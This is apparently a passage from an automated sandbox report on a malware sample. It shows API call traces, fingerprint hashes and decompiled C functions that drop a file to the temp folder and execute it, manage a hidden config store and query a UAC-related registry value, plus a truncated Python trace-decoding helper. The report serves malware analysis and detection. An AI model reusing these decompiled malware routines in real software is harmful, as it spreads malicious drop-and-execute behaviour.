                                                                                                                                    • Part of subcall function 00409064: wsprintfA.USER32 ref: 004090E9
                                                                                                                                    • Part of subcall function 00409064: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040910E
                                                                                                                                    • Part of subcall function 00409064: lstrlenA.KERNEL32(00000000,00000100,00000000), ref: 00409122
                                                                                                                                    • Part of subcall function 00409064: WriteFile.KERNEL32(00000000,00000000,00000000), ref: 0040912D
                                                                                                                                    • Part of subcall function 00409064: CloseHandle.KERNEL32(00000000), ref: 00409134
                                                                                                                                  • ShellExecuteA.SHELL32(00000000,00000000,?,00000000,00000000,00000000), ref: 004091E1
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                   • Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$HandleModulewsprintf$CharCloseCreateExecuteNamePathShellTempWritelstrlen
                                                                                                                                  • String ID: PromptOnSecureDesktop
                                                                                                                                  • API String ID: 3857584221-2980165447
                                                                                                                                  • Opcode ID: 94b6a3cd4bae5339fb675e52ca0e10f722d210c4c3e56ae61748716d573fc5c2
                                                                                                                                  • Instruction ID: 6acb945c628b875356ea86accac8c7b18cb61426f44bb7d0566a1afba52fbd3a
                                                                                                                                  • Opcode Fuzzy Hash: 94b6a3cd4bae5339fb675e52ca0e10f722d210c4c3e56ae61748716d573fc5c2
                                                                                                                                  • Instruction Fuzzy Hash: 8F016DB69001187BD720A7619D49EDF3A7C9B85705F0000A6BB09E2080DAB89AC48F68
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleA.KERNEL32(00000000,?,00000104), ref: 00AD93C6
                                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000), ref: 00AD93CD
                                                                                                                                  • CharToOemA.USER32(?,?), ref: 00AD93DB
                                                                                                                                  • wsprintfA.USER32 ref: 00AD9410
                                                                                                                                    • Part of subcall function 00AD92CB: GetTempPathA.KERNEL32(00000400,?), ref: 00AD92E2
                                                                                                                                    • Part of subcall function 00AD92CB: wsprintfA.USER32 ref: 00AD9350
                                                                                                                                    • Part of subcall function 00AD92CB: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00AD9375
                                                                                                                                    • Part of subcall function 00AD92CB: lstrlen.KERNEL32(?,?,00000000), ref: 00AD9389
                                                                                                                                    • Part of subcall function 00AD92CB: WriteFile.KERNEL32(00000000,?,00000000), ref: 00AD9394
                                                                                                                                    • Part of subcall function 00AD92CB: CloseHandle.KERNEL32(00000000), ref: 00AD939B
                                                                                                                                  • ShellExecuteA.SHELL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00AD9448
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.280127790.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_ad0000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$HandleModulewsprintf$CharCloseCreateExecuteNamePathShellTempWritelstrlen
                                                                                                                                  • String ID: PromptOnSecureDesktop
                                                                                                                                  • API String ID: 3857584221-2980165447
                                                                                                                                  • Opcode ID: ff085cb3efc643ea3343cce32a213b77a8dc5f084f98a1949d4da58a8db7cba0
                                                                                                                                  • Instruction ID: bafb0e456df2b34b5a7c23d956ab2b96938125186af01b8b3b3065720206f7dd
                                                                                                                                  • Opcode Fuzzy Hash: ff085cb3efc643ea3343cce32a213b77a8dc5f084f98a1949d4da58a8db7cba0
                                                                                                                                  • Instruction Fuzzy Hash: 5E015EF69001187BDB21A7619D89EDF3B7CDB95701F0040A2BB4AE2180EAB49BC5CF75
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.280127790.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_ad0000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrlen
                                                                                                                                  • String ID: $localcfg
                                                                                                                                  • API String ID: 1659193697-2018645984
                                                                                                                                  • Opcode ID: e25caa720acfe6edeb1ed6cfdeeca69567da959aa4b90cf3eb174d19221d8523
                                                                                                                                  • Instruction ID: bd0a35fae379fbc19e0fde485de31ef1418525aeffd31340c964b05cdec44c7c
                                                                                                                                  • Opcode Fuzzy Hash: e25caa720acfe6edeb1ed6cfdeeca69567da959aa4b90cf3eb174d19221d8523
                                                                                                                                  • Instruction Fuzzy Hash: AB713D72A00304AAEF219B94DD85FEE377A9B20715F244027F907A63D1DB619DC4875B
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279779724.0000000000415000.00000020.00000001.01000000.00000003.sdmp, Offset: 00415000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_415000_OcmKX57vR7.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _write_multi_char$__mbtowc_l_get_int_arg_write_string
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4186970751-0
                                                                                                                                  • Opcode ID: a9b0658f57c9b68557d3b915ef1ce8d4fa1ad7a417cb490e0d2228624f03d81f
                                                                                                                                  • Instruction ID: f39460077ea95656aa980f8ee85ddbd5759fc33d01551210f6fb9fd778779053
                                                                                                                                  • Opcode Fuzzy Hash: a9b0658f57c9b68557d3b915ef1ce8d4fa1ad7a417cb490e0d2228624f03d81f
                                                                                                                                  • Instruction Fuzzy Hash: 52A173B1E002289BDB24CF56DC817AEB7B5BB44305F5481DAE6096B281D7386E84CF5D
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 98%
                                                                                                                                  			E0040E8A1(void* __edx, char _a4, CHAR* _a8, CHAR* _a12, CHAR* _a16) {
                                                                                                                                  				CHAR* _v8;
                                                                                                                                  				signed int _v12;
                                                                                                                                  				intOrPtr _v16;
                                                                                                                                  				CHAR* _v20;
                                                                                                                                  				intOrPtr _v24;
                                                                                                                                  				CHAR* _v28;
                                                                                                                                  				CHAR* _v32;
                                                                                                                                  				intOrPtr _v36;
                                                                                                                                  				char _v37;
                                                                                                                                  				char _v52;
                                                                                                                                  				char _v56;
                                                                                                                                  				intOrPtr _t87;
                                                                                                                                  				intOrPtr _t95;
                                                                                                                                  				int _t126;
                                                                                                                                  				void* _t136;
                                                                                                                                  				void* _t138;
                                                                                                                                  				CHAR* _t139;
                                                                                                                                  				void* _t146;
                                                                                                                                  				char _t150;
                                                                                                                                  				void* _t154;
                                                                                                                                  				void* _t158;
                                                                                                                                  				void* _t159;
                                                                                                                                  
                                                                                                                                  				_t146 = __edx;
                                                                                                                                  				_v20 = 0;
                                                                                                                                  				E0040DD05();
                                                                                                                                  				_t150 = _a4;
                                                                                                                                  				_t158 = E0040DD84(_t150, _a8);
                                                                                                                                  				_pop(_t138);
                                                                                                                                  				if(_t158 != 0) {
                                                                                                                                  					L2:
                                                                                                                                  					_t16 = _t158 + 0x30; // 0x30
                                                                                                                                  					_v8 = E00402419(_t138, _t16,  *((intOrPtr*)(_t158 + 0x24)), _a12);
                                                                                                                                  					_t21 = lstrlenA(_a12) + 1; // 0x1
                                                                                                                                  					_t136 = _t21;
                                                                                                                                  					_t87 = lstrlenA(_a16) + _t136 + 1;
                                                                                                                                  					_v16 = _t87;
                                                                                                                                  					if(_v8 == 0) {
                                                                                                                                  						_t139 =  *((intOrPtr*)(_t158 + 0x24));
                                                                                                                                  						_v12 = _v12 & 0x00000000;
                                                                                                                                  						_v8 = _t139;
                                                                                                                                  						_t152 = _t139;
                                                                                                                                  					} else {
                                                                                                                                  						_t126 = lstrlenA(_v8);
                                                                                                                                  						_t152 = _v8 - _t136 - _t158 + 0xffffffd0;
                                                                                                                                  						_v12 = _t126 + _t136 + 1;
                                                                                                                                  						_t87 = _v16;
                                                                                                                                  						_v8 = _v8 - _t136 - _t158 + 0xffffffd0;
                                                                                                                                  					}
                                                                                                                                  					if(_v12 == _t87) {
                                                                                                                                  						E0040EE08(_t152 + _t158 + 0x30, _a12, _t136);
                                                                                                                                  						E0040EE08(_t152 + _t136 + _t158 + 0x30, _a16, _v16 - _t136);
                                                                                                                                  						_t77 = _t158 + 0x30; // 0x30
                                                                                                                                  						_t95 = E004024C2(_t77,  *((intOrPtr*)(_t158 + 0x24)), 0);
                                                                                                                                  						if( *((intOrPtr*)(_t158 + 0x20)) != _t95) {
                                                                                                                                  							 *((intOrPtr*)(_t158 + 0x20)) = _t95;
                                                                                                                                  							 *0x4136c0 = 1;
                                                                                                                                  						}
                                                                                                                                  					} else {
                                                                                                                                  						_t41 = _t87 + 0x24; // 0x24
                                                                                                                                  						_t154 = E0040EBCC( *((intOrPtr*)(_t158 + 0x24)) - _v12 + _t41);
                                                                                                                                  						if(_t154 != 0) {
                                                                                                                                  							_t43 = _t158 + 0xc; // 0xc
                                                                                                                                  							E0040EE08(_t154, _t43,  &(_v8[0x24]));
                                                                                                                                  							 *((intOrPtr*)(_t154 + 0x18)) =  *((intOrPtr*)(_t158 + 0x24)) - _v12 + _v16;
                                                                                                                                  							_v20 =  &(_v8[_t154]);
                                                                                                                                  							E0040EE08( &(( &(_v8[_t154]))[0x24]), _a12, _t136);
                                                                                                                                  							E0040EE08( &(_v20[_t136 + 0x24]), _a16, _v16 - _t136);
                                                                                                                                  							E0040EE08( &(_v20[_v16 + 0x24]),  &(( &(_v8[_v12]))[_t158 + 0x30]),  *((intOrPtr*)(_t158 + 0x24)) - _v8 - _v12);
                                                                                                                                  							_t66 = _t154 + 0x24; // 0x24
                                                                                                                                  							 *((intOrPtr*)(_t154 + 0x14)) = E004024C2(_t66,  *((intOrPtr*)(_t154 + 0x18)), 0);
                                                                                                                                  							E0040DF4C( *((intOrPtr*)(_t158 + 0x24)) - _v8 - _v12, _t154);
                                                                                                                                  							E0040EC2E(_t154);
                                                                                                                                  							_v20 = 1;
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  					L10:
                                                                                                                                  					E0040DD69();
                                                                                                                                  					return _v20;
                                                                                                                                  				}
                                                                                                                                  				_v56 = _t150;
                                                                                                                                  				_v28 = 0;
                                                                                                                                  				_v24 = 3;
                                                                                                                                  				lstrcpynA( &_v52, _a8, 0x10);
                                                                                                                                  				_v37 = 0;
                                                                                                                                  				_v32 = 0;
                                                                                                                                  				_v36 = E004024C2( &_v20, 0, 0);
                                                                                                                                  				E0040DF4C(_t146,  &_v56);
                                                                                                                                  				_t158 = E0040DD84(_t150, _a8);
                                                                                                                                  				_t159 = _t159 + 0x18;
                                                                                                                                  				if(_t158 == 0) {
                                                                                                                                  					goto L10;
                                                                                                                                  				}
                                                                                                                                  				goto L2;
                                                                                                                                  			}

                                                                                                                                   Instruction addresses for E0040E8A1: 0x0040e8a1 0x0040e8ac 0x0040e8af 0x0040e8b7 0x0040e8c0 0x0040e8c3 0x0040e8c6 0x0040e917 0x0040e91a 0x0040e932 0x0040e93a 0x0040e93a 0x0040e943 0x0040e947 0x0040e94a 0x0040e96a 0x0040e96d 0x0040e971 0x0040e974 0x0040e94c 0x0040e94f 0x0040e95c 0x0040e95f 0x0040e962 0x0040e965 0x0040e965 0x0040e979 0x0040ea3a 0x0040ea4f 0x0040ea59 0x0040ea5d 0x0040ea68 0x0040ea6a 0x0040ea6d 0x0040ea6d 0x0040e97f
                                                                                                                                  0x0040e985
                                                                                                                                  0x0040e98f
                                                                                                                                  0x0040e994
                                                                                                                                  0x0040e9a1
                                                                                                                                  0x0040e9a6
                                                                                                                                  0x0040e9b8
                                                                                                                                  0x0040e9c0
                                                                                                                                  0x0040e9c7
                                                                                                                                  0x0040e9dd
                                                                                                                                  0x0040ea02
                                                                                                                                  0x0040ea0c
                                                                                                                                  0x0040ea16
                                                                                                                                  0x0040ea19
                                                                                                                                  0x0040ea22
                                                                                                                                  0x0040ea28
                                                                                                                                  0x0040ea28
                                                                                                                                  0x0040e994
                                                                                                                                  0x0040ea77
                                                                                                                                  0x0040ea77
                                                                                                                                  0x0040ea83
                                                                                                                                  0x0040ea83
                                                                                                                                  0x0040e8d1
                                                                                                                                  0x0040e8d4
                                                                                                                                  0x0040e8d7
                                                                                                                                  0x0040e8de
                                                                                                                                  0x0040e8ea
                                                                                                                                  0x0040e8ed
                                                                                                                                  0x0040e8f5
                                                                                                                                  0x0040e8fc
                                                                                                                                  0x0040e90a
                                                                                                                                  0x0040e90c
                                                                                                                                  0x0040e911
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000

APIs
  • Part of subcall function 0040DD05: GetTickCount.KERNEL32 ref: 0040DD0F
  • Part of subcall function 0040DD05: InterlockedExchange.KERNEL32(004136B4,00000001), ref: 0040DD44
  • Part of subcall function 0040DD05: GetCurrentThreadId.KERNEL32 ref: 0040DD53
  • Part of subcall function 0040DD84: lstrcmpiA.KERNEL32(80000011,00000000,00000108,80000001,00000000,0040DE62,80000001,80000005,00000108,00000000,000000E4,00000000,?,0040E3A7,000000F0), ref: 0040DDB5
• lstrcpynA.KERNEL32(?,00401E84,00000010,localcfg,?,flags_upd,?,?,?,?,?,0040EAAA,?,?), ref: 0040E8DE
• lstrlenA.KERNEL32(?,localcfg,?,flags_upd,?,?,?,?,?,0040EAAA,?,?,00000001,?,00401E84,?), ref: 0040E935
• lstrlenA.KERNEL32(00000001,?,?,?,?,?,0040EAAA,?,?,00000001,?,00401E84,?,0000000A), ref: 0040E93D
• lstrlenA.KERNEL32(00000000,?,?,?,?,?,0040EAAA,?,?,00000001,?,00401E84,?), ref: 0040E94F
Strings
Memory Dump Source
• Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
Yara matches
Similarity
• API ID: lstrlen$CountCurrentExchangeInterlockedThreadTicklstrcmpilstrcpyn
• String ID: flags_upd$localcfg
• API String ID: 204374128-3505511081
• Opcode ID: a8706cbe59c11349abe89667f011435cb075cce9c025d7d828ab42ec1d016fb1
• Instruction ID: 4a5a107d8aad74d0ab91cd578fe54778089971c235e688b3f19fdb3cdc8cf470
• Opcode Fuzzy Hash: a8706cbe59c11349abe89667f011435cb075cce9c025d7d828ab42ec1d016fb1
• Instruction Fuzzy Hash: A5514F7290020AAFCB00EFE9C985DAEBBF9BF48308F14452EE405B3251D779EA548B54
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00ADDF6C: GetCurrentThreadId.KERNEL32 ref: 00ADDFBA
• lstrcmp.KERNEL32(00410178,00000000), ref: 00ADE8FA
• lstrcpyn.KERNEL32(00000008,00000000,0000000F,?,00410170,00000000,?,00AD6128), ref: 00ADE950
• lstrcmp.KERNEL32(?,00000008), ref: 00ADE989
Strings
Memory Dump Source
• Source File: 00000000.00000002.280127790.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ad0000_OcmKX57vR7.jbxd
Yara matches
Similarity
• API ID: lstrcmp$CurrentThreadlstrcpyn
• String ID: A$ A$ A
• API String ID: 2920362961-1846390581
• Opcode ID: 22b7ec265cbf58d9e118b1c9ae896798d4c4cc7fc0edb460ff72d5a9b3fd5feb
• Instruction ID: 011a75af45d52bff0f5ef39771d206e935a209eaa84ca13aac1c540f12480ceb
• Opcode Fuzzy Hash: 22b7ec265cbf58d9e118b1c9ae896798d4c4cc7fc0edb460ff72d5a9b3fd5feb
• Instruction Fuzzy Hash: 7E319E316017059BDB71EF24C894BAABBE4FB05721F10892BE5678B751D370EC81CB81
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000000.00000002.280127790.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ad0000_OcmKX57vR7.jbxd
Yara matches
Similarity
• API ID: Code
• String ID:
• API String ID: 3609698214-0
• Opcode ID: dbd61df3ebb78cc6fa2ed7637639bc7d17aa9fbedb66480432ceb7f56d018bc4
• Instruction ID: a74f01eaa8273b15f1a520d604e4e25194c27c9c4b5f5d97eeae5242cc338f28
• Opcode Fuzzy Hash: dbd61df3ebb78cc6fa2ed7637639bc7d17aa9fbedb66480432ceb7f56d018bc4
• Instruction Fuzzy Hash: 20214A76204219BFDB10ABA0ED49EDF3FBDEB49761B208426F503D5191EF709A4096B4
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
E0040DD05() {
	long _t4;
	long _t10;

	_t10 = GetTickCount();
	while(InterlockedExchange(0x4136b4, 1) != 0) {
		if(GetCurrentThreadId() != *0x4136b8) {
			if(GetTickCount() - _t10 >= 0x2710) {
				*0x4136bc = *0x4136bc & 0x00000000;
			} else {
				Sleep(0);
				continue;
			}
		}
		L7:
		_t4 = GetCurrentThreadId();
		*0x4136bc = *0x4136bc + 1;
		*0x4136b8 = _t4;
		return _t4;
	}
	goto L7;
}

APIs
• GetTickCount.KERNEL32 ref: 0040DD0F
• GetCurrentThreadId.KERNEL32 ref: 0040DD20
• GetTickCount.KERNEL32 ref: 0040DD2E
• Sleep.KERNEL32(00000000,?,761B43E0,?,00000000,0040E538,?,761B43E0,?,00000000,?,0040A445), ref: 0040DD3B
• InterlockedExchange.KERNEL32(004136B4,00000001), ref: 0040DD44
• GetCurrentThreadId.KERNEL32 ref: 0040DD53
Memory Dump Source
• Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
Yara matches
Similarity
• API ID: CountCurrentThreadTick$ExchangeInterlockedSleep
• String ID:
• API String ID: 3819781495-0
• Opcode ID: 00222842cf4b27377529e63430db8cbc0b0fb89ac28641eb4cfa7891be51bad4
• Instruction ID: 5047c4a85d7ce053583ecb6bfb553561e79882e3d1eaa06aec664d00f8baf4e0
• Opcode Fuzzy Hash: 00222842cf4b27377529e63430db8cbc0b0fb89ac28641eb4cfa7891be51bad4
• Instruction Fuzzy Hash: 1AF0E971604204AFD7505FA5BC84BB53FA4EB48353F008077E109D22A8C77455898F2E
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 93%
                                                                                                                                  			E004080C9(int* __ecx) {
                                                                                                                                  				int _v8;
                                                                                                                                  				void* _v12;
                                                                                                                                  				int _v16;
                                                                                                                                  				char _v20;
                                                                                                                                  				char _v52;
                                                                                                                                  				char _v312;
                                                                                                                                  				void* _t27;
                                                                                                                                  				void* _t31;
                                                                                                                                  				char* _t35;
                                                                                                                                  				char* _t42;
                                                                                                                                  				char* _t45;
                                                                                                                                  				intOrPtr* _t49;
                                                                                                                                  				intOrPtr _t52;
                                                                                                                                  				intOrPtr _t57;
                                                                                                                                  				void* _t60;
                                                                                                                                  				intOrPtr _t63;
                                                                                                                                  				void* _t65;
                                                                                                                                  				void* _t68;
                                                                                                                                  				CHAR _t70;
                                                                                                                                  				intOrPtr _t71;
                                                                                                                                  
                                                                                                                                  				_t56 = __ecx;
                                                                                                                                  				_v8 = 0;
                                                                                                                                   				 *0x412c3c = 0; // global: heap copy of the registry value data, freed again below on failure
                                                                                                                                   				 *0x412c38 = 0; // global: heap copy of the value name string
                                                                                                                                  				if(E00406EC3() != 0) {
                                                                                                                                  					_t27 = E0040704C(0x410264, 0, 0,  &_v312,  &_v52);
                                                                                                                                  					_t65 = _t65 + 0x14;
                                                                                                                                  					if(_t27 <= 0 || _v312 == 0 || _v52 == 0) {
                                                                                                                                  						goto L20;
                                                                                                                                  					} else {
                                                                                                                                  						_t35 = E00402544(0x4122f8,  &E004106AC, 0x2e, 0xe4, 0xc8);
                                                                                                                                  						_t68 = _t65 + 0x14;
                                                                                                                                   						if(RegOpenKeyExA(0x80000001, _t35, 0, 0x101,  &_v12) != 0) { // 0x80000001 = HKEY_CURRENT_USER, 0x101 = KEY_QUERY_VALUE | KEY_WOW64_64KEY; _t35 = subkey name decoded by E00402544 above
                                                                                                                                  							L19:
                                                                                                                                  							E0040EE2A(_t56, 0x4122f8, 0, 0x100);
                                                                                                                                  							_t65 = _t68 + 0xc;
                                                                                                                                  							goto L20;
                                                                                                                                  						}
                                                                                                                                   						if(RegQueryValueExA(_v12,  &_v312, 0,  &_v16, 0,  &_v8) != 0 || _v16 != 1 || _v8 <= 0) { // size probe with a NULL data pointer: _v16 receives the type (1 = REG_SZ), _v8 the byte count
                                                                                                                                  							L15:
                                                                                                                                  							_t42 =  *0x412c3c; // 0x0
                                                                                                                                  							if(_t42 == 0) {
                                                                                                                                  								goto L18;
                                                                                                                                  							}
                                                                                                                                  							E0040EC2E(_t42);
                                                                                                                                  							 *0x412c3c = 0;
                                                                                                                                  							goto L17;
                                                                                                                                  						} else {
                                                                                                                                   							_t45 = E0040EBCC(_v8); // heap-allocate a buffer of the reported size (E0040EC2E, its free counterpart, calls HeapFree)
                                                                                                                                  							_pop(_t56);
                                                                                                                                  							 *0x412c3c = _t45;
                                                                                                                                  							if(_t45 == 0) {
                                                                                                                                  								L18:
                                                                                                                                  								RegCloseKey(_v12);
                                                                                                                                  								goto L19;
                                                                                                                                  							}
                                                                                                                                  							_t56 =  &_v8;
                                                                                                                                   							if(RegQueryValueExA(_v12,  &_v312, 0,  &_v16, _t45,  &_v8) != 0) { // second query fills the buffer; REG_SZ data returned by RegQueryValueExA is not guaranteed to be NUL-terminated
                                                                                                                                  								goto L15;
                                                                                                                                  							}
                                                                                                                                  							_t49 =  &_v312;
                                                                                                                                  							_t60 = _t49 + 1;
                                                                                                                                   							do { // inlined strlen over the value name in _v312
                                                                                                                                  								_t57 =  *_t49;
                                                                                                                                  								_t49 = _t49 + 1;
                                                                                                                                  							} while (_t57 != 0);
                                                                                                                                  							_t52 = E0040EBCC(_t49 - _t60 + 1);
                                                                                                                                  							_pop(_t56);
                                                                                                                                  							 *0x412c38 = _t52;
                                                                                                                                  							if(_t52 == 0) {
                                                                                                                                  								goto L18;
                                                                                                                                  							}
                                                                                                                                  							E0040EF00(_t52,  &_v312);
                                                                                                                                  							L17:
                                                                                                                                  							_pop(_t56);
                                                                                                                                  							goto L18;
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  				} else {
                                                                                                                                  					E00407EE6(_t56);
                                                                                                                                  					L20:
                                                                                                                                  					_t70 =  *0x4121a8; // 0x0
                                                                                                                                  					if(_t70 != 0) {
                                                                                                                                  						_t71 =  *0x4121a4; // 0x0
                                                                                                                                  						if(_t71 == 0) {
                                                                                                                                   							_t31 = E0040675C(0x4121a8,  &_v20, 0); // subcall 0040675C reads the file named at 0x4121a8 into a heap buffer (SetFileAttributesA/CreateFileA/ReadFile in the API list); _v20 apparently receives its length
                                                                                                                                  							_t61 = _t31;
                                                                                                                                  							if(_t31 != 0) {
                                                                                                                                  								_t63 = _v20;
                                                                                                                                  								 *0x4122d4 = E004024C2(_t61, _t63, 0);
                                                                                                                                  								 *0x4121a4 = _t63;
                                                                                                                                  								E0040EC2E(_t61);
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  					return 1;
                                                                                                                                  				}
                                                                                                                                  			}

                                                                                                                                   Instruction addresses of this listing: 0x004080c9 to 0x00408273 (the decompiler view's per-line address column, whose alignment with the code above was lost in extraction)

                                                                                                                                  APIs
                                                                                                                                  • RegOpenKeyExA.ADVAPI32(80000001,00000000,?,?,00000000,00000101,?,?,?,?,761B43E0,00000000), ref: 0040815F
                                                                                                                                  • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,0040A45F,?,?,00000000,00000101,?,?,?,?,761B43E0,00000000), ref: 00408187
                                                                                                                                  • RegQueryValueExA.ADVAPI32(?,?,00000000,00000001,00000000,0040A45F,?,?,00000000,00000101,?,?,?,?,761B43E0,00000000), ref: 004081BE
                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,00000000,00000101,?,?,?,?,761B43E0,00000000), ref: 00408210
                                                                                                                                    • Part of subcall function 0040675C: SetFileAttributesA.KERNEL32(?,00000080,?,761B43E0,00000000), ref: 0040677E
                                                                                                                                    • Part of subcall function 0040675C: CreateFileA.KERNELBASE(?,80000000,00000003,00000000,00000003,00000080,00000000,?,761B43E0,00000000), ref: 0040679A
                                                                                                                                    • Part of subcall function 0040675C: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000004,00000000,?,761B43E0,00000000), ref: 004067B0
                                                                                                                                    • Part of subcall function 0040675C: SetFileAttributesA.KERNEL32(?,00000002,?,761B43E0,00000000), ref: 004067BF
                                                                                                                                    • Part of subcall function 0040675C: GetFileSize.KERNEL32(000000FF,00000000,?,761B43E0,00000000), ref: 004067D3
                                                                                                                                    • Part of subcall function 0040675C: ReadFile.KERNELBASE(000000FF,?,00000040,00408244,00000000,?,761B43E0,00000000), ref: 00406807
                                                                                                                                    • Part of subcall function 0040675C: SetFilePointer.KERNELBASE(000000FF,?,00000000,00000000,?,761B43E0,00000000), ref: 0040681F
                                                                                                                                    • Part of subcall function 0040675C: ReadFile.KERNELBASE(000000FF,?,000000F8,?,00000000,?,761B43E0,00000000), ref: 0040683E
                                                                                                                                    • Part of subcall function 0040675C: SetFilePointer.KERNELBASE(000000FF,?,00000000,00000000,?,761B43E0,00000000), ref: 0040685C
                                                                                                                                    • Part of subcall function 0040EC2E: GetProcessHeap.KERNEL32(00000000,'@,00000000,0040EA27,00000000), ref: 0040EC41
                                                                                                                                    • Part of subcall function 0040EC2E: HeapFree.KERNEL32(00000000), ref: 0040EC48
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                   • Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$AttributesCreateHeapPointerQueryReadValue$CloseFreeOpenProcessSize
                                                                                                                                  • String ID: PromptOnSecureDesktop
                                                                                                                                  • API String ID: 124786226-2980165447
                                                                                                                                  • Opcode ID: f8d88a9031908b503ac4450561c2f1a3dcf4dc87a59708a9d294670bec484122
                                                                                                                                  • Instruction ID: c6ff5cc28a73505882571aaa3479db7aabb841166acb9389a4089cab67cb233b
                                                                                                                                  • Opcode Fuzzy Hash: f8d88a9031908b503ac4450561c2f1a3dcf4dc87a59708a9d294670bec484122
                                                                                                                                  • Instruction Fuzzy Hash: 6641A2B1801109BFEB10EBA19E81DEF777CDB04304F1448BFF545F2182EAB85A948B59
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%
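The API list above shows each call with the raw hexadecimal stack words Joe Sandbox captured at the call site. The following is an added example, not code from the Joe Sandbox report or from the sample: it parses lines in that format (the `• Name.Module(args), ref: ADDR` shape and the `Part of subcall function ADDR:` prefix are assumed from the listing) and decodes the arguments whose meaning is fixed by the Win32 prototype, namely the registry hive and access mask, and CreateFile's access, share mode, disposition and attribute words, into their documented names. The sample input is constructed by copying lines from this function's API list.

```python
"""Decode a Joe Sandbox 'APIs' trace into named Win32 constants.

Added example; not code from the Joe Sandbox report or from the sample.
Line format assumed from the listing above:
    • Name.Module(arg,arg,...), ref: ADDR
    • Part of subcall function ADDR: Name.Module(arg,...), ref: ADDR
The arguments are raw stack words captured at the call site; '?' or any
non-hex token is kept as None, and positional decoding is only meaningful
where those words line up with the API prototype.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample input: lines copied from this function's API list.
SAMPLE = """\
• RegOpenKeyExA.ADVAPI32(80000001,00000000,?,?,00000000,00000101,?,?,?,?,761B43E0,00000000), ref: 0040815F
• RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,0040A45F,?,?,00000000,00000101,?,?,?,?,761B43E0,00000000), ref: 00408187
  • Part of subcall function 0040675C: SetFileAttributesA.KERNEL32(?,00000080,?,761B43E0,00000000), ref: 0040677E
  • Part of subcall function 0040675C: CreateFileA.KERNELBASE(?,80000000,00000003,00000000,00000003,00000080,00000000,?,761B43E0,00000000), ref: 0040679A
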